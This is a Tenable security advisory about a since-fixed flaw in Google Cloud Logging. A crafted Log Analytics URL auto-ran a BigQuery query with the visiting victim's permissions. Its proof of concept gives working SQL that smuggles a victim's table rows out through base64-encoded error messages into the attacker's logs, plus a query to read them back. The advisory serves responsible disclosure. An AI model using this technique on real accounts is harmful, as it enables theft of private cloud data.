Synopsis
Tenable Research has identified and responsibly disclosed a data exfiltration vulnerability in Google Cloud Logging. This flaw allowed an attacker to exfiltrate data from a victim's BigQuery datasets by visiting a maliciously crafted Cloud Logging URL.
When a user navigates to a Log Analytics URL, the embedded SQL query is automatically submitted, even when set to use the BigQuery engine. An attacker could exploit this behavior by granting the victim BigQuery permissions in the attacker’s project and crafting a malicious URL containing a "Join" query. The query links a log view in the attacker’s project to a sensitive dataset in the victim’s project. Because the query is executed in the context of the user viewing the page, it runs with the victim's permissions. The attacker can therefore create a URL for a Log Analytics query that runs in their own project, but raises the results of the victim's dataset as an error. When the victim browses to the URL, their private BigQuery data will be exfiltrated to the attacker’s project logs.
Proof of Concept:
- Make sure that Log Analytics is active, with a reservation and that there is at least one log view available with a linked BigQuery dataset
- Give the victim’s principal IAM permissions in the attacker’s tenant
- Browse to Log Analytics
- Click '<> SQL' to change the query builder into SQL mode
- Click the settings cog icon, and select the BigQuery engine
- Run any legitimate query
- Copy the URL, and replace the legitimate query with a malicious query:
SELECT
ERROR(CONCAT('EXFIL: ', TO_BASE64(
CAST(
TO_JSON_STRING(ARRAY_AGG(t)) AS BYTES
))
))
FROM (
SELECT t
FROM
`[ATTACKER_PROJECT].global._Default._AllLogs` AS l
CROSS JOIN `[VICTIM_PROJECT].[VICTIM_DATASET].[VICTIM_TABLE]` AS t
LIMIT 1 OFFSET 0
);
- Get the victim to browse to the new malicious URL, which will run the query automatically
- Once the victim browses to the URL, query the logs to view the exfiltrated data:
SELECT
CAST(
FROM_BASE64(
REGEXP_EXTRACT(
proto_payload.audit_log.status.message, r'^EXFIL:\s+([A-Za-z0-9+/=]+)'
)
) AS STRING
)
FROM
`[ATTACKER_PROJECT].global._Default._AllLogs`
WHERE severity = "ERROR" AND starts_with(proto_payload.audit_log.status.message, 'EXFIL')
ORDER BY timestamp DESC
Solution
Google has resolved the issue by stopping the automatic running of log analytics queries. Queries involving resources that do not share an ownership boundary will now display a warning message to ask users to check if the query is safe, and manually initiate running the query in charts, once confirmed.
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]